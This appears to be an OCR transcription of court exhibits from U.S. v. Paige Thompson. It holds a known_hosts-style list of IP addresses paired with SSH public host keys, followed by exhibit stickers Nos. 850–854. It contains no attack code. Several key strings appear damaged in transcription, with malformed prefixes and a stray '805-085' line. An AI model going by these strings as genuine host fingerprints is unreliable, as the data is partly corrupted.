IKkX5LSORkLv9GvkEZaAqnM5YRqrgFGIQIY3bfLm+HsYOZHHniSC4jx4Wz5FZ6B6KldhQFna9rqI3XRKfimjWGN641c4r5dBI+OvpoNzTeb
cFXoB6HPPQhX2+JAr83hIKMYYGev9xsj3oqmR+p2V2kOBO2EQ5T
95.170.152.150 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH+/Rn7siffYVTaEXZn3jWWBC2gq5ZNG+DahITmwOEJtjFe/tuG732R
bzyB4a8yweoX4wJxQaH6l8DnwwvwcjWI=
95.191.131.119 ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAAABAQCpHxst+OYNl9yd+PmZfFRDXOE3wbpmrF5yvgm5AoPLRA4zpddGj2j27TTOQ2yeFrcCy1dyukNcYYQ
LzeGQtyl4iB1+TXN58DgYcB1q82/T27GF6+kosRT54egte9Ju5y+ZxgCj4RM6E1Q+VvfI8xIhWNZcBRtKCVV8kxVpyXmFxcCvH7EvPHckGU
NoOULTp4zQecECu5+gNZPgy/Liqn9XOal8+dgr+71VQQPyJoz7I/OzQRm4ACCy56Q0eHAzv3PSop4nHdJJwHIqqORKRtyCghDpkt5D24yuh
/W1Xf0Oj9pyonPCoMOZlGb2+NnfXeEl7Vd6CIcrhmVwfuCe/VdN
95.213.174.82 ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAAABAQCfVfLYlGddxBeNcdMAxS4DscalY/VQNsPB0sb+BRxSwkyax5yfMJxL53O3k3NK5fKeAGpeomtUPBk
L7CeorSZbDZdJK48ndPDUoYTwZrydfDYQW2ywY0UKWjYG+DKJsf8Ek9JD+w8A9mWH+WkYg4NrB0t6UbgLb/Pa9bHMzlUq35s6PEztH+8cVO
oHmcva99mV3xL83batA74W8DifdgIHg6Hsa+/lRHRAFD3KUCZTBUJLdAEtkyWDtKHKImW4QYicihXyYWbOCgmeKyrGwtgZRMNfeQrivShv4
qpKtjrnZgiGUHT2kjxHesWIP9dfujERXlGw6aq34eBsrnRC2MpP
95.213.243.98 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO4/mxancqojFPcp/fJDE7V7SgSSqM95qOc5HBV6PeKwcq6Btr6OY1n
2/UUmpo4E+HrS+393Uu0ecr16qZ4oCTQ=
95.165.157.63 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBCZDI6TJQffhvKM/SaPvTxHSutYVHjgdQDWhAPD0s7dIuiomSfj0Qqm
wGX8QGIJG128f1wNv7CCRIxUBwxbvW1U=
95.213.202.122 ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAAABQDLqNd1A6jIpoM1KBQ/vf9qnJYI4LLRAvF9OxjFWhL+NoX88dbNfRN1i41h4IkxlNW2R32iYPXgE/8
3Vjez2bzQkyYUTQguaLc7tmeB6gzfjlIs8X2WCEjHk2ZkVDapOBQxW8OB+G8KBr5QVAI3QeCS2uyeIL1Fx822Fdp5t/6vxjOEsGl0WhUtev
MBYLrQlJs//Z/qGiassmQIHWoO8riXizGw2j1Cd0B+Pcvw1+MMZxiUJX4i/+WLArg5jCkNe5RGkMJnHkBL9aVPK7Sa64OGJV8nWjW9PU3v
CpwkGLp6VhS6x0vW17KFXC97wj/lZjSpgrff0HlpixDZlLdQdaz
95.31.250.11 ssh-rsa
AAAAB3NzaC1yc2EAAAABAwAAAQEA1MewHhQcvqvClWvlHTG/+t6CEpNZbgOHSr774GUo+oyyNpTV3QA1q3j4sDrJThp/yD/vjLSgoHuQqJG
4yhj+jeOOIcN1RKunBvrcJQSYGpNivaO+paLfSfZtcAHgz6FM33o9KlVDhaQf3FgTv/e0uOEoHOLlngCBSQSjro59+byYNuaRflMfWAyY3C
WWCrvK06b3q/SP97AR1CJ5OgZi44IuAe2OTnczFphceeu7yXGnv3swux4rBQcXvkJvmJ+xj4+ivedfBkNNno6NPEiNTjcQg5Hx69cLRDdqE

TPWGQhxBXi9VHDUCFQzDkCLfgrGmp2/JkbcStsii8zxGKW2EQ==
95.163.153.17 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAz5VFGQABfUkoVZpf8qTb3Y4JB0AUrMeGZdgRteHhuF76hEf/re2MmtWDZRiv5kvXtTysPa9ZeG1pu/z
iJclwElV2gAKYG+Lqg8Qy/gXwRE7DvLdYu9zLHGg9cg+ChWL9hIBak9rs9CdmnNSn0vJtksFg/8pA0mNpejGAYGlN5dNBpYXAujJ1gQ/1/H
YsrXQMtas2rTW/KGnI2ZBAY0koIKEBXP0TsyNFbxtxUB4c3NorxxSbf2cyD/lo3OLtVaukq+OY6pCwzlnJJ+4y8k78L8sbJ89QZlPiWKaMT
BY3wGhEox46MeZjaCcDjTWsmTAwYelo6HoFiQrrzDDRHQfkJw==
86.102.86.198 ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAAAgQCTR63HlblyVvvQrAkXbf9eYYz34Daa2ki+Od3FFy2DimR4XYIGSaEJsEeDRr8td9VDsEl32V+OrLc
1VxVi983BIGHI4qqizGkjcDTr2UWD919wOvLnzgaJ+V2okbg/EeRSix5PB+xTtd6IXdmHN/NA2wWESLH5/d0u+f7N/5cVUQ==
91.221.41.12 ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDjybVqFrsINHWqXQ/cd7m7lL+WTMIhrgEp9BNbLkfzAz7/8nX1r0NN+illntkT9ZbKyWxvPBVWuzI
4Lot26z86YxMfQEIXJrFqMDCAVa21eSdB8oM9LuIWKwXxf64zE3/dSKRRU1u3uu+w4WpwYIfAvGM2EJFroTSpYgyyxIx0MS4lwki9Syr1Dw
69LNEF2JuNeKiPvbTQyiHtw54sAK/DcUXBFoNNeUKwZEU8WOcmMNJjssY/+dzAbT7hiRR1FarMMkY66zooD25/bK30ODvdlN5do6GYwPNMb
ttNNGq2QQyQZu56k2CzJPSWc0G2qRdRsriEt+Zg9JRgC1lgD9kX
94.140.198.69 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP402XMCcjNOwVLNlIUuUg6N9vLBeR26/6l97r65bfX5lzfcxeg6k+I
OK7j3lb6pd3Lei5v2G7vVMmxBo7dbj3U=
185.80.130.250 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBNNAydnTz9q2Q6HVUvSY0e+IBPkqs++7DY5FGVo+AZeA0kKkRkbe7lI
gIjD06OVJxRm4NVRW/75dUkkGyY3fZN4=
13.53.137.56 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBD4q6w4EaX+YzpRN+PSqrra1qbjy0ruZJbqNJUa7eFzFN2awsSy3etg
PWSF7H4lmxwVPv15H9oZ0/dn2gQbFFWQ=
34.200.220.172 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBKcUYT9w0XjXhaBSC5hngqSkhDM2N8vFGv33SfjCrb/tFSE2pwlHUTj
HrAL4BOBjJXQH3i7jRANGlsS99uD+6Yc=
35.178.179.237 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAJXreXJTq0o1JUEOE1rp4di7coY0acY9pSnvPguQLxcwSHK4+3Esb
gzugc4Wi8rhonEfRM8S0FIRZ+eQBbdqo=
35.178.115.79 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBD4ErcK1tcPewQJf/KufkRbKY5oV4GuGyXwD+vFrv0idCstqvUp1c+Z
dj3FIyAw31KGq5YNjUG+qNH3gRKBjsbQ=
18.130.229.26 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBJBZHATB0HbsyD6XNu0rLX6hCH/P2AS9drFHdZ0pktPOw8dbUe9tx16
c9efI750ep1Qm33QBcdTQXynGfQBioso=
3.8.151.175 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBDf2BgrcbOMo60FcPXxEl0XaJInJK/O3La0IyFQ0UebQvH6XFI/Mmlo
aMkboQeWc5zs5o7RpzmysWErlXHrL7ao=
18.130.200.182 ecdsa-sha2-nistp256

805-085

AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPxNcKaXYO0VoFnBZbGbMMyq9CuciWlDAhYAnUOJOvSolAveIzkZf5f
k/Cny4Nv0c3cu0LSf3Il/A0g8CDLu3/Y=
3.8.138.77 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpPMk7dQMPZlPNtJGRkYd1LsC64yFYzAO6XnSasFs4HfdggGd/Gdto
UqR+wtpjHpClPc+kGQ5buz/69Gfou4a8=
54.245.138.241 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGiczWUGjDt+WAuaH6bVeWTkU+d2phk54kSMW2HELmRvAsrjgGaDeac
XCF4t5Un3rvBrCOcstqW2eP0cXr+MU2M=
34.219.67.228 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLeypzxYGYvUh+lGXbI/6tlR/u+jqN9IDvn2bXtqxNPKccSz/5il9gi
6fikwZgue+llwY6qRfiaCGkBU3W1JiG8=
54.218.184.212 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO9wh9sJFTf0M3+AKmfncrRarlmtGciHOT1ExbKVCMc3mF+9+e2ySlw
vq8yHzLbIwuPYqINPBjmvO+2scO1E8W8=
34.217.80.183 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPeKWa9xzFdfP4NQDFuNT2tAS7a+F+JLyKjsYu9cfxM7SP2E/CgkJpk
jgBqdvkFh7SIXYZ/HP8toImvAQZKcxrY=
54.191.222.165 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCV8iQNnzHf2YUIcpXLvWWwboNp1HCIbuXa/29J5QcYYsWpEqhz1r9Q
nvFWAyOVocbz5y/7fGq5GTwADI/le/OE=
54.71.189.62 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB+onZf6pAMItCNOHpSy71iBJumty3bjKGsJE07VaU7L7FWoxpBbsSL
7Gq1l7SnISwmHFcR/cr4ZMZyj/Tb3erI=
18.217.93.189 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJqPaGvHtYZ5DxHLsbwfHAdNazQUbuzYUfGdXj9HhGashrFml8Gjpym
DrfxG3hld/DDA9c+ipEiO/4W/Bvgq8C0=
52.14.129.153 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPI/9FlGgChOl4Hu5eIS4X0kqqH+nTl1ovFkuFlRJFtpLS3iuizzlkU
dO/LiBOyOQTAs8QJfDWFd7O3+myJlj70=
18.130.57.216 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJw49YrNFgp6Ie2CTxw6Jy6+KeLy0Tc9Ub64/1ibMWiuWgsi/Fw8um/
cZU1x5nGB5i1EONyWRXU+Zpht3Ll5lik=
35.177.14.176 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPGREYUYziLsze8Ml/MyNKf4Wpl6RxXIubAzon93SkTTOkVObKhOM7J
9QQ+HUTv1Etb+eJzdW0KOhTKiTeGSmEE=



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 850
Admitted_____



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 851
Admitted_____



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 852
Admitted_____



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 853
Admitted_____



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 854
Admitted_____